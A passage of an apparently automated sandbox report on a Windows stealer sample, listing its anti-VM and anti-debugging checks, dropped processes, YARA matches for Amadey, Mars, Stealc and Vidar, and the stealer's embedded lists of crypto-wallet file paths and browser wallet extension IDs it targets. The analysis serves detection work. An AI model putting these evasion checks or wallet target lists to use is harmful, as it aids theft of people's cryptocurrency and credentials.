Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.4.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: explorti.exe, 0000000A.00000002.2897406345.00000000007B3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VBoxService.exe
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.4.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VMWare
Source: Amcache.hve.4.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 1jPL5zru3u.exe, 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: 1jPL5zru3u.exe, 00000000.00000002.1858205526.0000000000EEC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_04C200B1 Start: 04C205B4 End: 04C200CA 10_2_04C200B1
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Code function: 6_2_04A60000 rdtsc 6_2_04A60000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C425FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C425FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C42C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C42C410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BD643B mov eax, dword ptr fs:[00000030h] 10_2_00BD643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 10_2_00BDA1A2 mov eax, dword ptr fs:[00000030h] 10_2_00BDA1A2
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C3FB66C
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C3FB1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe" Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FHJKKECFIE.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe "C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CAEHDBAAEC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: CAEHDBAAEC.exe, CAEHDBAAEC.exe, 00000006.00000002.1925142002.000000000072D000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: %Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3FB341 cpuid 0_2_6C3FB341
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1jPL5zru3u.exe Code function: 0_2_6C3C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C3C35A0
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.4.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 6.2.CAEHDBAAEC.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.explorti.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.explorti.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000003.2332547916.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1921777147.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1924963108.0000000000531000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2373035840.0000000000BA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.1884034371.0000000004850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1962404330.0000000000BA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2898835808.0000000000BA1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1920034287.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Mars stealer
Source: Yara match File source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1858205526.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.1860013089.00000000019F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.2.1jPL5zru3u.exe.cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1858205526.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1jPL5zru3u.exe PID: 6980, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001A49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: 1jPL5zru3u.exe, 00000000.00000002.1860013089.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda 